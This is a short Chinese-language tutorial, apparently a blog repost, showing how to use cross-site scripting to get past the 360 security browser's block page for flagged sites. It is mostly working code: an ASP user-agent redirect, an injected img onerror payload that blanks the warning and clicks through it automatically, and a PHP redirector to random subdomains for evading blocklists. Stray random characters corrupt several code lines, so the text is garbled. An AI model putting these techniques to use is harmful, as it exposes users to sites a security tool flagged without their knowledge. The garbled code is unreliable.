如何利用xss绕过360网盾做防360拦截空间！详解

1、未解除之前的状态 ：

2、code 区域<%Dim ua ua = Request.ServerVariables("HTTP_USER_AGENT")If (I荏鱿胫协nstr(ua, "Windows NT 5.1") = 0 or Instr(ua, "Windows NT 6.1") = 0) and Instr(ua, "MSIE")>0 Then '除了 xp win7 以外的系统Response.Redirect("index1.asp")elseResponse.Redirect("index2.asp")End IF%>

3、index1.asp粝简肯惧内容：code 区域<% dim url y=""""url = "http://www.已区仁苣逢被拦截域名.com/?<img/onerror="& y &"document.title='';document.getElementById('safemon').action='http://www.已被拦截域名.com/?';document.getElementsByTagName('div')[0].innerHTML='';forceOpenUrl();"& y &"src=0>" response.redirect url%>这里目的可以看下拦截页面源码//忽略警告，继续访问function forceOpenUrl() { if(warn_from=='se6'){ external.AppCmd(external.GetSID(window),"sesafe","safebrowsing_openurl", ucode,"", function(i1,s1){}) location.href = jump; return; }else{ document.getElementById("safemon").submit(); }} function closeWindow(){ window.opener=null; window.open('','_self'); window.close(); }

4、z7y.php内容：code 区域<?phpfunction randomkeys($length){ $patter荏鱿胫协n='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLOMNOPQRSTUVWXYZ'; for($i=0;$i<$length;$i++) { $key .= $pattern{mt_rand(0,35)}; //php随机数 } return $key;}header('HTTP/1.1 404');ob_start();phpinfo();$url="http://".randomkeys(5).".xxxx.info/"; $list1=$_GET["/l?"]; $rurl=$url.$list1."";header("location: $rurl");ob_end_clean();?>

5、修复后：

6、我做这个演示，并不是让做非法网站的站长钻空子，而是希望帮助到一部分被误拦截的站长而伤透脑筋有这个方法可行，如果还有什么专业问题不能解决，代码不明白，可以问我